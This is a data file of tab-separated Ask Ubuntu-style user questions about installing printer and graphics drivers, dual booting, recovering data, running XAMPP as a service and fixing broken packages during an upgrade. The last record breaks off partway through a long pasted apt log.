439008	new to ubuntu ( linux ) . would like to install a printer . a bit clueless	i installed ubuntu 13.10 on my old dell desktop . it runs fine and i like the ubunte experience . i found most software using the 'software centre ' . but not for my canon printer . i went to their website and they do have a linux driver . i downloaded it and it is called : linux_print_filterv270.tgz i unpacked it and got a folder with a number of .rpm files . i have not clue what to do next . could you help me with it ? edit : i am a bit further . i installed alien to convert the .rmp file to a .deb file . i read on a website to use this command but get an error ... sudo -k cnijfilter-common-2.70-2.src.rpm [ sudo ] password for michel : sudo : cnijfilter-common-2.70-2.src.rpm : command not found also tried @ jos : sudo alien cnijfilter-common-2.70-2.src.rpm -- > file `` cnijfilter-common-2.70-2.src.rpm '' not found . edit 15.55 : i entered the alien but it still doesn work sudo alien -k cnijfilter-common-2.70.2.src.rpm opdracht ‘-sudo’ niet gevonden , bedoelde u : opdracht ‘sudo’ uit pakket ‘sudo-ldap’ ( universe ) opdracht ‘sudo’ uit pakket ‘sudo’ ( main ) -sudo : opdracht niet gevonden ( not found ) edit : 16:30 i had forgotten to switch directories ( already had a gut feeling about that ) . i was then able to have alien to create a .deb file . when installing that i got a message that it was of bad quality . i choose to ignore and the installation failed . the file i got from @ jos was also of bad quality but it did install , finally . thanks for all the help guys ! i sure hope installing drivers will not always be this difficult for a newbie .
439009	every usb hard drive connected to ubuntu loses partition information	whenever i connect an external usb hard drive with an ntfs partition to my ubuntu driven netbook all partitions are lost for windows machines and listed as raw . sequence : ⠀usb hard drive with ntfs partition ( s ) and data ⠀connecting usb hard drive to ubuntu . ⠀all partitions are being recognized , icons appearing on desktop , i can copy , read and write . ⠀right-click on the icon ( s ) , choose to safely unmount . ⠀after connecting to a windows computer , os is asking to format partitions and windows disk management shows them as raw . i checked with three hard drives in a row on two separate usb adapters . why is this happening and how to prevent it ?
439010	how do i install ati radeon hd 3200 graphics driver in 12.04 64 desktop ?	i have had difficulty installing the drivers and i 'm open to running a newer version of ubuntu . to get the ati radeonâ˘ hd 3200 graphics working on an acer 5517 is there a way to do it that is reliable ? i have tried some ppa installs and had to reinstall ubuntu , not a crisis but is there a way to get the drivers installed ? is there a reliable way to install fglrx this did n't seem to work old fglrx driver - amd radeon hd 3200 - ubuntu wo n't start
439014	dual boot fail - can not instal ubuntu	i tried to install ubuntu 13 on my laptop . i have a 750gb hdd and a 120gb ssd . i have windows 8.1 installed on my ssd . the 750gb hdd is patitioned in 2 partitions : d:649gb and e:32.2gb . i also have a free space of 14.65gb . i want to install ubuntu on that free space but when i boot to install ubuntu it show the entirely hdd . i mention that my hdd is installed instead of dvd-rom with a caddy , and the ssd is in the normal place of the ssd . https : //www.dropbox.com/s/wtipwepwv2yzn7c/1920104_760354950650158_188131928_n.jpg https : //www.dropbox.com/s/nvamysif0ahu1e1/screenshot % 202014-03-25 % 2016.22.42.png
439015	how can i get ubuntu and windows xp to dual boot ? ( solved )	i tried to install ubuntu 12.04 alongside windows xp home . everything appeared to be progressing normally and i was prompted to eject the cd and reboot . the result was : error : no such device : 1c8bea6b-44fd-4bef-b0cd-f1ef87666ec2 grub rescue > _ i typed ls and got this : ( hd0 ) ( hd0 , msdos2 ) ( hd0 , msdos1 ) ( fd0 ) the computer is a dell dimension 8250 desktop 1gb rdram maxtor 40gb [ c drive ] wd 20gb [ d drive ] i wanted to dual boot ubuntu and window , and install ubuntu to d ( the only choice given ) . i have downloaded and burned a bunch of utilities in anticipation of problems . the computer will still boot from the dvd ( not the cd , i do n't know why it was ok before ) . right now the computer is booted to a linux graphical desktop environment ( xfce ) systemrescuecd4.1 one of the programs is something called partimage : sda1 fat16 31.35 mib -- - windows recovery ? sda2 ntfs 37.24 gib -- - this is windows ( i think ) sr1 unknown 0 bytes -- - what is this ? ( dvd drive maybe ) sdb1 ntfs 5.58 gib sdb2 extended sdb5 ext3fs 12.53 gib -- - this is linux ( i think ) sdb6 swap ( v1 ) 1024 mib -- - linux swap file xfce has a terminal mode where i hope i can type some cryptic magic words that will get ubuntu and windows dual booting as i intended . i 'm also wondering what wrong with this installation . thanks very much to anyone who can help me figure out where to go from here . -- -- -- -- -- -- -- - found it ! -- -- -- -- -- -- -- -- setting in bios primary drive 0 ... ... .. hard disk primary drive 1 ... ... .. off changed off to auto ... .. save and exit ... .. boot continues and hooray ! there is my boot menu with linux and win xp odd that i had to change something bios for a drive that could be seen by windows and gparted to get grub to work right
439018	is it possible to recover data after reinstalling ubuntu on same drive	i just lost 2tb data when i reinstalled ubuntu 13.04 on already installed ubuntu 13.10 . can anyone help me how to extract or recover whole partition , i am sure hard disk is formatted because its now showing only 30gb used data out of 2tb . so is there any way to recover whole partition . i am trying test disk for now which is recovering very slowly but at least recovering .
439022	edit color profile ( .icc ) to change gamma	as a lot of other users here on ask ubuntu , i need to use xrandr to correct the gamma settings on one of my external monitors . settings applied this way are n't permanent and they can reset basically randomly ( for me ) . would it be possible to somehow edit the default color profile of my monitor and just change the gamma value , then reimport it into gnome color configuration utility ? i do n't have access to specialized calibration equipment .
439026	store output of command into the array	this is command : pdc status -a 2 > & 1 | grep 'okay ' it gives the following output [ okay ] : you are currently listening : 33 [ okay ] : you are currently listening : 22 [ okay ] : you are currently listening : 11 i have written this command in shell scrip file . but i want to store the output of this command into the array for some processing on each of the index value in the array . how can i store the output of this command into the array ?
439029	12.04 recognises dual monitors but one screen has a black overlay in the way of everything but the mouse cursor	this has worked fine up until today . the first screen works absolutely fine . the second screen however , is seen by the os , is visible in the display settings and works absolutely fine in mirror mode . however , when i disable mirror mode , the second screen just displays black , although the mouse cursor is visible on in . the screen is also recognised by the desktop manager as a valid desktop ; it allows windows to be moved onto it ( which are not visible beneath the black overlay ) and if i use the workspace switcher i can see a rendering of what is on the screen . if i aim the mouse correctly i can even click windows on the second screen and move them back to the first . this happens on unity , unity 2 , gnome and gnome without effects . the events that led up to this are as follows : i 've been having problems with chrome recently , it flickers a lot ( more or less this issue - google chrome `` flickering '' ) so i just stopped using it ( suggested solution did n't work ) . before that i did try updating the amd graphics drivers to the latest ones ( card is amd radeon hd 7700 ) which did n't fix it . earlier today ( before the screen issue ) i tried using unity 2d to see if it would fix it , which is when the second screen just stopped working ( as described at the start ) . i also tried chrome there and the whole screen had graphical glitches , not just the web page and the computer locked up . after restarting and going back into normal unity , the second screen was still not working ( as described above ) . chrome again brought the whole system down . and the same issue also occurs in gnome ( with and without effects ) . edit : graphics driver version is amd-catalyst-13.12-linux-x86.x86_64 . also discovered that the sound ( over hdmi ) is giving glitches ( distorted and repeating sections ) and am also getting sporadic graphical glitches , particularly when opening the unity main menu . another strange thing i 've noticed ; the screen that has the black overlay is n't a particular screen , it 's whichever is set to be on the right of the other monitor . if i move the layout of the screens in display settings around to other configurations , then some times both screens have black overlays and other times only a part of the second screen has a black overlay . more information : specs : intel i7 3.4ghz ( haswell ) xfx radeon 7700 1tb hdd z87 chipset 32gb ddr3 ram i also tried the open source drivers , they did n't recognise the card at all . ubuntu would get as far as the loading screen and then stop ( still displaying the logo and 5 lights ) . also tried the beta catalyst driver , exactly the same symptoms as previously as did reinstalling the original catalyst driver .
439031	iscan does n't work with epson wf-3520	i 'm trying to use iscan to scan some documents from my printer epson wf-3520 . the problem is that if i try to run iscan program i get the following message : could not send command to scanner . check the scanner 's status . i already tried to open it from terminal : sudo iscan and i get the same result . i am able to use the program simple scan to scan through my printer but only using the flatbed . if i try to use the document feeder the program freezes and the printer goes crazy forcing me to restart her . also simple scan lacks many of the functionality of the iscan .
439036	how to change the command line title as in this image ?	this might be a n00b question , but recently i started to use vagrant with ubuntu 12.04 and i discovered , every line in the command line looks like this : i have a raspberry pi , but debian on it has the same look as ubuntu : how could i change the look of this `` title '' before every command , to show the actual time for example ? it would be nice sometimes to see , when i entered a command .
439037	how do i know how much disk space is free/used on my boot partition ?	i 'm going to drop files to my boot partition . which console command should i use to figure out how much space is free/total there ?
439046	sony pcg tr5mp compatibility	i am trying to restore the tr5mp to usable life by replacing windows xp with ubuntu 13.1 . using the 32-bit version a message appears on the screen saying that a component ( pae ) is missing . it then goes no further . the tr5mp is absolutely standard - 1.1ghz pentium m ulv , 40gb disk and 512k ram . it is possible to upgrade the ram to 1gb . guidance on what is amiss would be much appreciated .
439049	make xampp a service and start on boot	this seems a common problem and i thought i should be able to find this question in the site , but i was not successful so i 'm asking it myself . i installed xampp through the www.apachefriends.org installer and it is set in the /opt/lampp directory . how can i make xampp a service so i can start it with service lampp start and how can i make the service start on boot ? maybe important aditional information : i 'm not really using ubuntu , i 'm using lubuntu which describes itself as a fast and lightweight operating system developed by a community of free and open source enthusiasts . the core of the system is based on linux and ubuntu . lubuntu uses the minimal desktop lxde , and a selection of light applications . the answers i found untill now uses the ui to set this things but my lubuntu instalation does n't have some of the menus so i need to do this through command line . some generic debian answer or something like that . thanks : )
439050	how to setup virtualization on ubuntu server 12.04	i want to setup virtualization on ubuntu server 12.04 , how can i get libvirt-bin ? have installed the ubuntu server 12.04. but i ca n't install kvm and libvirt in the server .
439051	ubuntu installation help wanted	i have an old laptop with 2gb of ram and an old intel processor running 2 versions of vista , one of which wo n't load and says it requires the repair cd and the other has a partition called recovery ( c : ) i do n't know much about computers , but i 'm trying to install ubuntu 13.10 on that laptop . ubuntu launches and i can run it from a live cd . after doing a scan it says there are no bad files on the cd , but when i try to install ubuntu it shows the loading bit after i 've chosen my network ( wifi ) , but seems to make no progress . are the things i said at the start the problem ?
439052	evince document viewer stopped working after upgrade to ubuntu 13.10 from 13.04	i have upgraded to ubuntu 13.10 ( 32-bit ) from ubuntu 13.04 but after upgrade my evince document viewer stopped working . whenever i open a document ( pdf ) it shows itself on the launcher but does n't open the document . i have no option but to quit evince then . by running through terminal it prints the following message . ( evince:2495 ) : evincedocument-critical ** : ev_document_get_n_pages : assertion 'ev_is_document ( document ) ' failed
439053	software updater fails to upgrade to 13.10	i need help upgrading from 12.10 to 13.10 . it 's a little under a month to 14.04 but even sooner until support for 12.10 is dropped , so i decided to upgrade to 13.10 in the meantime . i used software updater to upgrade , but it keeps bumping into this problem : not all updates can be installed an unresolvable problem occurred while calculating the upgrade : e : unable to correct problems , you have held broken packages . this can be caused by : * upgrading to a pre-release version of ubuntu * running the current pre-release version of ubuntu * unofficial software packages not provided by ubuntu if none of this applies , then please report this bug using the command 'ubuntu-bug ubuntu-release-upgrader-core ' in a terminal . i think that i 'm having a similar problem as this : can you help me fix my broken packages ? which is unfortunately still unresolved . so , after reading this : how to fix the `` unable to calculate upgrade '' issue when upgrading from 12.04 to 12.10 ? , i tried checking for the problem with : grep broken /var/log/dist-upgrade/apt.log here 's the output : broken libunity9 : amd64 breaks on unity-common [ amd64 ] < 6.12.0-0ubuntu0.2 > ( gnome ) ( < 7.1.2 ) broken libpam-systemd : amd64 conflicts on libpam-xdg-support [ amd64 ] < 0.2-0ubuntu1.1 > ( admin ) broken libclutter-1.0-0 : amd64 breaks on libcogl9 [ amd64 ] < 1.10.4-0ubuntu1 > ( libs ) broken cups-filters : amd64 conflicts on ghostscript-cups [ amd64 ] < 9.06~dfsg-0ubuntu4 > ( text ) broken libmutter0b : amd64 breaks on libmutter0 [ amd64 ] < 3.6.3-0ubuntu0.1 > ( libs ) broken packagekit : amd64 breaks on libpackagekit-glib2-14 [ amd64 ] < 0.7.6-1 > ( libs ) ( < = 0.7.6-4 ) broken python3-aptdaemon.pkcompat : amd64 conflicts on packagekit [ amd64 ] < 0.7.6-1 - > 0.8.10-2ubuntu2 > ( admin ) broken libaudit-common : amd64 breaks on libaudit0 [ amd64 ] < 1.7.18-1ubuntu1 > ( libs ) broken python3-uno : amd64 conflicts on python-uno [ amd64 ] < 1:3.6.2~rc2-0ubuntu4 > ( python ) broken im-config : amd64 conflicts on im-switch [ amd64 ] < 1.22ubuntu2.2 - > 1.23ubuntu1 > ( universe/x11 ) broken libgjs0d : amd64 conflicts on libgjs0c [ amd64 ] < 1.34.0-0ubuntu1 > ( libs ) broken unity-scope-home : amd64 conflicts on unity-lens-shopping [ amd64 ] < 6.8.0-0ubuntu1 > ( gnome ) broken fonts-droid : amd64 breaks on ttf-droid [ amd64 ] < 20111207+git-1ubuntu1 > ( oldlibs ) ( < 1:4.2~r1-1~ ) broken libsnmp-base : amd64 breaks on libsnmp15 [ amd64 ] < 5.4.3~dfsg-2.5ubuntu1 > ( libs ) ( < 5.7.2~dfsg-5 ) broken gnome-packagekit : amd64 breaks on gnome-software-manager [ amd64 ] < 3.6.0-0ubuntu1 > ( gnome ) ( < 3.6.0-2 ) broken qemu-kvm : amd64 conflicts on qemu-kvm-spice [ amd64 ] < 1.2.0-2012.09-0ubuntu1 > ( misc ) broken xserver-xorg-video-mach64 : amd64 depends on xorg-video-abi-13 [ amd64 ] < none > ( none ) broken xserver-xorg-video-trident : amd64 depends on xorg-video-abi-13 [ amd64 ] < none > ( none ) broken xserver-xorg-video-sis : amd64 depends on xorg-video-abi-13 [ amd64 ] < none > ( none ) broken unity-gtk2-module : amd64 conflicts on appmenu-gtk [ amd64 ] < 12.10.2-0ubuntu1.3 > ( libs ) broken xserver-xorg-video-siliconmotion : amd64 depends on xorg-video-abi-13 [ amd64 ] < none > ( none ) broken xserver-xorg-input-vmmouse : amd64 depends on xorg-input-abi-18 [ amd64 ] < none > ( none ) broken xserver-xorg-video-savage : amd64 depends on xorg-video-abi-13 [ amd64 ] < none > ( none ) broken xserver-xorg-video-intel : amd64 depends on xorg-video-abi-13 [ amd64 ] < none > ( none ) broken lib32asound2 : amd64 depends on libasound2 [ amd64 ] < 1.0.25-3ubuntu3.1 - > 1.0.27.2-1ubuntu6 > ( libs ) ( = 1.0.25-3ubuntu3.1 ) broken xserver-xorg-video-r128 : amd64 depends on xorg-video-abi-13 [ amd64 ] < none > ( none ) broken xserver-xorg-video-vesa : amd64 depends on xorg-video-abi-13 [ amd64 ] < none > ( none ) broken unity-gtk3-module : amd64 conflicts on appmenu-gtk3 [ amd64 ] < 12.10.2-0ubuntu1.3 > ( libs ) broken xserver-xorg-video-s3 : amd64 depends on xorg-video-abi-13 [ amd64 ] < none > ( none ) broken osspd : amd64 conflicts on oss-compat [ amd64 ] < 2ubuntu1 - > 4 > ( universe/sound ) broken osspd : amd64 conflicts on oss-compat [ i386 ] < none - > 4 > ( universe/sound ) broken xserver-xorg-video-fbdev : amd64 depends on xorg-video-abi-13 [ amd64 ] < none > ( none ) broken xserver-xorg-video-nouveau : amd64 depends on xorg-video-abi-13 [ amd64 ] < none > ( none ) broken xserver-xorg-video-neomagic : amd64 depends on xorg-video-abi-13 [ amd64 ] < none > ( none ) broken xserver-xorg-video-sisusb : amd64 depends on xorg-video-abi-13 [ amd64 ] < none > ( none ) broken friends-app : amd64 conflicts on gwibber-service [ amd64 ] < 3.6.0-0ubuntu1.1 - > 3.7.0bzr13.04.05-0ubuntu1 > ( universe/misc ) broken libgphoto2-6-dev : amd64 conflicts on libgphoto2-2-dev [ amd64 ] < 2.4.14-2 > ( libdevel ) broken xserver-xorg-input-mouse : amd64 depends on xorg-input-abi-18 [ amd64 ] < none > ( none ) broken gwibber : amd64 depends on friends-app [ amd64 ] < none - > 0.92.0+13.10.20131001.1-0ubuntu1 > ( universe/gnome ) broken activity-log-manager : amd64 conflicts on activity-log-manager-common [ amd64 ] < 0.9.4-0ubuntu4.2 > ( utils ) broken gnome-update-viewer : amd64 depends on libpackagekit-glib2-14 [ amd64 ] < 0.7.6-1 > ( libs ) broken libgtksourceview-3.0-0 : amd64 depends on libgtksourceview-3.0-common [ amd64 ] < 3.6.0-0ubuntu1 - > 3.8.2-0ubuntu1 > ( libs ) ( < 3.7 ) broken libcogl-pango0 : amd64 depends on libcogl9 [ amd64 ] < 1.10.4-0ubuntu1 > ( libs ) ( > = 1.9.6 ) broken libgnome-desktop-3-4 : amd64 depends on gnome-desktop3-data [ amd64 ] < 3.6.0.1-0ubuntu2 - > 3.8.4-0ubuntu1.1 > ( gnome ) ( = 3.6.0.1-0ubuntu2 ) broken wine1.4-common : amd64 depends on wine1.4 [ amd64 ] < 1.4.1-0ubuntu1 - > 1.4.1-0ubuntu7 > ( universe/otherosfs ) ( = 1.4.1-0ubuntu1 ) broken teamviewer7 : amd64 depends on lib32asound2 [ amd64 ] < 1.0.25-3ubuntu3.1 > ( libs ) broken libexttextcat-1.0-0 : amd64 depends on libexttextcat-data [ amd64 ] < 3.3.1-2 - > 3.4.0-4 > ( text ) ( = 3.3.1-2 ) broken libunity-core-6.0-5 : amd64 depends on unity-services [ amd64 ] < 6.12.0-0ubuntu0.2 - > 7.1.2+13.10.20131014.1-0ubuntu1 > ( gnome ) ( = 6.12.0-0ubuntu0.2 ) broken libbamf3-0 : amd64 depends on bamfdaemon [ amd64 ] < 0.3.6-0ubuntu2 - > 0.5.1+13.10.20131011-0ubuntu1 > ( libs ) ( = 0.3.6-0ubuntu2 ) broken libbamf0 : amd64 depends on bamfdaemon [ amd64 ] < 0.3.6-0ubuntu2 - > 0.5.1+13.10.20131011-0ubuntu1 > ( libs ) ( = 0.3.6-0ubuntu2 ) broken xserver-xorg-video-all : amd64 depends on xserver-xorg-video-fbdev [ amd64 ] < 1:0.4.3+git20120801.2edaad4a-0ubuntu0sarvatt > ( x11 ) broken xserver-xorg-video-all : amd64 depends on xserver-xorg-video-intel [ amd64 ] < 2:2.99.906+git20131213.f350a136-0ubuntu0sarvatt~quantal > ( x11 ) broken xserver-xorg-video-all : amd64 depends on xserver-xorg-video-neomagic [ amd64 ] < 1:1.2.7+git20120912.bc78be1c-0ubuntu0sarvatt > ( x11 ) broken xserver-xorg-video-all : amd64 depends on xserver-xorg-video-nouveau [ amd64 ] < 1:1.0.9+git20130730.300c5a32-0ubuntu0sarvatt~quantal > ( x11 ) broken xserver-xorg-video-all : amd64 depends on xserver-xorg-video-s3 [ amd64 ] < 1:0.6.5+git20120912.92d10d5d-0ubuntu0sarvatt > ( x11 ) broken xserver-xorg-video-all : amd64 depends on xserver-xorg-video-savage [ amd64 ] < 1:2.3.6+git20120801.3d181030-0ubuntu0sarvatt > ( x11 ) broken xserver-xorg-video-all : amd64 depends on xserver-xorg-video-siliconmotion [ amd64 ] < 1:1.7.7+git20120801.2beb25bd-0ubuntu0sarvatt > ( x11 ) broken xserver-xorg-video-all : amd64 depends on xserver-xorg-video-sis [ amd64 ] < 1:0.10.7+git20120912.339fb3bc-0ubuntu0sarvatt > ( x11 ) broken xserver-xorg-video-all : amd64 depends on xserver-xorg-video-sisusb [ amd64 ] < 1:0.9.6+git20120801.894814fe-0ubuntu0sarvatt > ( x11 ) broken xserver-xorg-video-all : amd64 depends on xserver-xorg-video-trident [ amd64 ] < 1:1.3.6+git20120801.3098fe71-0ubuntu0sarvatt > ( x11 ) broken xserver-xorg-video-all : amd64 depends on xserver-xorg-video-vesa [ amd64 ] < 1:2.3.2+git20120912.7aafaf56-0ubuntu0sarvatt > ( x11 ) broken xserver-xorg-input-all : amd64 depends on xserver-xorg-input-vmmouse [ amd64 ] < 1:12.9.0+git20120813.dba73ceb-0ubuntu0sarvatt > ( x11 ) broken xserver-xorg-video-ati : amd64 depends on xserver-xorg-video-r128 [ amd64 ] < 6.9.1+git20130104.24f28a78-0ubuntu0sarvatt~quantal > ( x11 ) broken xserver-xorg-video-ati : amd64 depends on xserver-xorg-video-mach64 [ amd64 ] < 6.9.4+git20130104.80e62cc1-0ubuntu0sarvatt~quantal > ( x11 ) broken xserver-xorg-video-mach64 : amd64 depends on xorg-video-abi-13 [ amd64 ] < none > ( none ) broken xserver-xorg-video-trident : amd64 depends on xorg-video-abi-13 [ amd64 ] < none > ( none ) broken xserver-xorg-video-sis : amd64 depends on xorg-video-abi-13 [ amd64 ] < none > ( none ) broken xserver-xorg-video-siliconmotion : amd64 depends on xorg-video-abi-13 [ amd64 ] < none > ( none ) broken xserver-xorg-input-vmmouse : amd64 depends on xorg-input-abi-18 [ amd64 ] < none > ( none ) broken xserver-xorg-video-savage : amd64 depends on xorg-video-abi-13 [ amd64 ] < none > ( none ) broken xserver-xorg-video-intel : amd64 depends on xorg-video-abi-13 [ amd64 ] < none > ( none ) broken xserver-xorg-video-r128 : amd64 depends on xorg-video-abi-13 [ amd64 ] < none > ( none ) broken xserver-xorg-video-vesa : amd64 depends on xorg-video-abi-13 [ amd64 ] < none > ( none ) broken xserver-xorg-video-s3 : amd64 depends on xorg-video-abi-13 [ amd64 ] < none > ( none ) broken xserver-xorg-video-fbdev : amd64 depends on xorg-video-abi-13 [ amd64 ] < none > ( none ) broken xserver-xorg-video-nouveau : amd64 depends on xorg-video-abi-13 [ amd64 ] < none > ( none ) broken xserver-xorg-video-neomagic : amd64 depends on xorg-video-abi-13 [ amd64 ] < none > ( none ) broken xserver-xorg-video-sisusb : amd64 depends on xorg-video-abi-13 [ amd64 ] < none > ( none ) broken xserver-xorg-video-all : amd64 depends on xserver-xorg-video-fbdev [ amd64 ] < 1:0.4.3+git20120801.2edaad4a-0ubuntu0sarvatt > ( x11 ) broken xserver-xorg-video-all : amd64 depends on xserver-xorg-video-intel [ amd64 ] < 2:2.99.906+git20131213.f350a136-0ubuntu0sarvatt~quantal > ( x11 ) broken xserver-xorg-video-all : amd64 depends on xserver-xorg-video-neomagic [ amd64 ] < 1:1.2.7+git20120912.bc78be1c-0ubuntu0sarvatt > ( x11 ) broken xserver-xorg-video-all : amd64 depends on xserver-xorg-video-nouveau [ amd64 ] < 1:1.0.9+git20130730.300c5a32-0ubuntu0sarvatt~quantal > ( x11 ) broken xserver-xorg-video-all : amd64 depends on xserver-xorg-video-s3 [ amd64 ] < 1:0.6.5+git20120912.92d10d5d-0ubuntu0sarvatt > ( x11 ) broken xserver-xorg-video-all : amd64 depends on xserver-xorg-video-savage [ amd64 ] < 1:2.3.6+git20120801.3d181030-0ubuntu0sarvatt > ( x11 ) broken xserver-xorg-video-all : amd64 depends on xserver-xorg-video-siliconmotion [ amd64 ] < 1:1.7.7+git20120801.2beb25bd-0ubuntu0sarvatt > ( x11 ) broken xserver-xorg-video-all : amd64 depends on xserver-xorg-video-sis [ amd64 ] < 1:0.10.7+git20120912.339fb3bc-0ubuntu0sarvatt > ( x11 ) broken xserver-xorg-video-all : amd64 depends on xserver-xorg-video-sisusb [ amd64 ] < 1:0.9.6+git20120801.894814fe-0ubuntu0sarvatt > ( x11 ) broken xserver-xorg-video-all : amd64 depends on xserver-xorg-video-trident [ amd64 ] < 1:1.3.6+git20120801.3098fe71-0ubuntu0sarvatt > ( x11 ) broken xserver-xorg-video-all : amd64 depends on xserver-xorg-video-vesa [ amd64 ] < 1:2.3.2+git20120912.7aafaf56-0ubuntu0sarvatt > ( x11 ) broken xserver-xorg-input-all : amd64 depends on xserver-xorg-input-vmmouse [ amd64 ] < 1:12.9.0+git20120813.dba73ceb-0ubuntu0sarvatt > ( x11 ) broken xserver-xorg-video-ati : amd64 depends on xserver-xorg-video-r128 [ amd64 ] < 6.9.1+git20130104.24f28a78-0ubuntu0sarvatt~quantal > ( x11 ) broken xserver-xorg-video-ati : amd64 depends on xserver-xorg-video-mach64 [ amd64 ] < 6.9.4+git20130104.80e62cc1-0ubuntu0sarvatt~quantal > ( x11 ) broken xserver-xorg-video-mach64 : amd64 depends on xorg-video-abi-13 [ amd64 ] < none > ( none ) broken xserver-xorg-video-trident : amd64 depends on xorg-video-abi-13 [ amd64 ] < none > ( none ) broken xserver-xorg-video-sis : amd64 depends on xorg-video-abi-13 [ amd64 ] < none > ( none ) broken xserver-xorg-video-siliconmotion : amd64 depends on xorg-video-abi-13 [ amd64 ] < none > ( none ) broken xserver-xorg-input-vmmouse : amd64 depends on xorg-input-abi-18 [ amd64 ] < none > ( none ) broken xserver-xorg-video-savage : amd64 depends on xorg-video-abi-13 [ amd64 ] < none > ( none ) broken xserver-xorg-video-intel : amd64 depends on xorg-video-abi-13 [ amd64 ] < none > ( none ) broken xserver-xorg-video-r128 : amd64 depends on xorg-video-abi-13 [ amd64 ] < none > ( none ) broken xserver-xorg-video-vesa : amd64 depends on xorg-video-abi-13 [ amd64 ] < none > ( none ) broken xserver-xorg-video-s3 : amd64 depends on xorg-video-abi-13 [ amd64 ] < none > ( none ) broken xserver-xorg-video-fbdev : amd64 depends on xorg-video-abi-13 [ amd64 ] < none > ( none ) broken xserver-xorg-video-nouveau : amd64 depends on xorg-video-abi-13 [ amd64 ] < none > ( none ) broken xserver-xorg-video-neomagic : amd64 depends on xorg-video-abi-13 [ amd64 ] < none > ( none ) broken xserver-xorg-video-sisusb : amd64 depends on xorg-video-abi-13 [ amd64 ] < none > ( none ) broken xserver-xorg-video-all : amd64 depends on xserver-xorg-video-fbdev [ amd64 ] < 1:0.4.3+git20120801.2edaad4a-0ubuntu0sarvatt > ( x11 ) broken xserver-xorg-input-all : amd64 depends on xserver-xorg-input-vmmouse [ amd64 ] < 1:12.9.0+git20120813.dba73ceb-0ubuntu0sarvatt > ( x11 ) broken xserver-xorg-video-ati : amd64 depends on xserver-xorg-video-r128 [ amd64 ] < 6.9.1+git20130104.24f28a78-0ubuntu0sarvatt~quantal > ( x11 ) broken xserver-xorg-video-mach64 : amd64 depends on xorg-video-abi-13 [ amd64 ] < none > ( none ) broken xserver-xorg-video-trident : amd64 depends on xorg-video-abi-13 [ amd64 ] < none > ( none ) broken xserver-xorg-video-sis : amd64 depends on xorg-video-abi-13 [ amd64 ] < none > ( none ) broken xserver-xorg-video-siliconmotion : amd64 depends on xorg-video-abi-13 [ amd64 ] < none > ( none ) broken xserver-xorg-video-savage : amd64 depends on xorg-video-abi-13 [ amd64 ] < none > ( none ) broken xserver-xorg-video-intel : amd64 depends on xorg-video-abi-13 [ amd64 ] < none > ( none ) broken xserver-xorg-video-r128 : amd64 depends on xorg-video-abi-13 [ amd64 ] < none > ( none ) broken xserver-xorg-video-vesa : amd64 depends on xorg-video-abi-13 [ amd64 ] < none > ( none ) broken xserver-xorg-video-s3 : amd64 depends on xorg-video-abi-13 [ amd64 ] < none > ( none ) broken xserver-xorg-video-fbdev : amd64 depends on xorg-video-abi-13 [ amd64 ] < none > ( none ) broken xserver-xorg-video-nouveau : amd64 depends on xorg-video-abi-13 [ amd64 ] < none > ( none ) broken xserver-xorg-video-neomagic : amd64 depends on xorg-video-abi-13 [ amd64 ] < none > ( none ) broken xserver-xorg-video-sisusb : amd64 depends on xorg-video-abi-13 [ amd64 ] < none > ( none ) broken xserver-xorg-video-all : amd64 depends on xserver-xorg-video-fbdev [ amd64 ] < 1:0.4.3+git20120801.2edaad4a-0ubuntu0sarvatt > ( x11 ) broken xserver-xorg-video-all : amd64 depends on xserver-xorg-video-intel [ amd64 ] < 2:2.99.906+git20131213.f350a136-0ubuntu0sarvatt~quantal > ( x11 ) broken xserver-xorg-video-all : amd64 depends on xserver-xorg-video-neomagic [ amd64 ] < 1:1.2.7+git20120912.bc78be1c-0ubuntu0sarvatt > ( x11 ) broken xserver-xorg-video-all : amd64 depends on xserver-xorg-video-nouveau [ amd64 ] < 1:1.0.9+git20130730.300c5a32-0ubuntu0sarvatt~quantal > ( x11 ) broken xserver-xorg-video-all : amd64 depends on xserver-xorg-video-s3 [ amd64 ] < 1:0.6.5+git20120912.92d10d5d-0ubuntu0sarvatt > ( x11 ) broken xserver-xorg-video-all : amd64 depends on xserver-xorg-video-savage [ amd64 ] < 1:2.3.6+git20120801.3d181030-0ubuntu0sarvatt > ( x11 ) broken xserver-xorg-video-all : amd64 depends on xserver-xorg-video-siliconmotion [ amd64 ] < 1:1.7.7+git20120801.2beb25bd-0ubuntu0sarvatt > ( x11 ) broken xserver-xorg-video-all : amd64 depends on xserver-xorg-video-sis [ amd64 ] < 1:0.10.7+git20120912.339fb3bc-0ubuntu0sarvatt > ( x11 ) broken xserver-xorg-video-all : amd64 depends on xserver-xorg-video-sisusb [ amd64 ] < 1:0.9.6+git20120801.894814fe-0ubuntu0sarvatt > ( x11 ) broken xserver-xorg-video-all : amd64 depends on xserver-xorg-video-trident [ amd64 ] < 1:1.3.6+git20120801.3098fe71-0ubuntu0sarvatt > ( x11 ) broken xserver-xorg-video-all : amd64 depends on xserver-xorg-video-vesa [ amd64 ] < 1:2.3.2+git20120912.7aafaf56-0ubuntu0sarvatt > ( x11 ) broken xserver-xorg-video-ati : amd64 depends on xserver-xorg-video-r128 [ amd64 ] < 6.9.1+git20130104.24f28a78-0ubuntu0sarvatt~quantal > ( x11 ) broken xserver-xorg-video-ati : amd64 depends on xserver-xorg-video-mach64 [ amd64 ] < 6.9.4+git20130104.80e62cc1-0ubuntu0sarvatt~quantal > ( x11 ) broken xserver-xorg-video-mach64 : amd64 depends on xorg-video-abi-13 [ amd64 ] < none > ( none ) broken xserver-xorg-video-trident : amd64 depends on xorg-video-abi-13 [ amd64 ] < none > ( none ) broken xserver-xorg-video-sis : amd64 depends on xorg-video-abi-13 [ amd64 ] < none > ( none ) broken xserver-xorg-video-siliconmotion : amd64 depends on xorg-video-abi-13 [ amd64 ] < none > ( none ) broken xserver-xorg-video-savage : amd64 depends on xorg-video-abi-13 [ amd64 ] < none > ( none ) broken xserver-xorg-video-intel : amd64 depends on xorg-video-abi-13 [ amd64 ] < none > ( none ) broken xserver-xorg-video-r128 : amd64 depends on xorg-video-abi-13 [ amd64 ] < none > ( none ) broken xserver-xorg-video-vesa : amd64 depends on xorg-video-abi-13 [ amd64 ] < none > ( none ) broken xserver-xorg-video-s3 : amd64 depends on xorg-video-abi-13 [ amd64 ] < none > ( none ) broken xserver-xorg-video-fbdev : amd64 depends on xorg-video-abi-13 [ amd64 ] < none > ( none ) broken xserver-xorg-video-nouveau : amd64 depends on xorg-video-abi-13 [ amd64 ] < none > ( none ) broken xserver-xorg-video-neomagic : amd64 depends on xorg-video-abi-13 [ amd64 ] < none > ( none ) broken xserver-xorg-video-sisusb : amd64 depends on 